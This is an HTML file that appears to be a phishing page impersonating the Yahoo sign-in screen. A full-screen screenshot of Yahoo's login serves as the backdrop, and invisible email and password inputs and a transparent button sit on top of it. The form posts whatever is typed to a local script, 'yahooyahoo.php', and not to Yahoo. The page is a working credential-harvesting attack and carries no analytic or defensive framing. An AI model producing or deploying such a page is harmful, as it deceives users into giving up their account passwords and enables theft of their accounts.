
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>YAHOO SIGN IN</title>
<style type="text/css">
body
{
   background-color: #F6F6F6;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:px;top:0px;width:1914px;height:923px;text-align:left;z-index:3;">
<img src="yahoo_files/Y001Y001.png" id="Image1" alt="" style="width:1914px;height:923px;" align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:490px;height:100px;z-index:4">
<form name="Form1" method="post" action="yahooyahoo.php"">

<input id="email" style="position:absolute;left:1146px;top:215px;width:300px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:0" name="email" value="" type="text" required placeholder="Enter Your Email">


<input id="password" style="position:absolute;left:1146px;top:266.5px;width:300px;height:42px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" name="password" value="" type="password" required placeholder="Password">


<input id="Button1" name="Button1" value="" style="position:absolute;left:1146px;top:334px;width:300px;height:42px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2;cursor: pointer;" type="submit">
</form>
</div>
</body></html>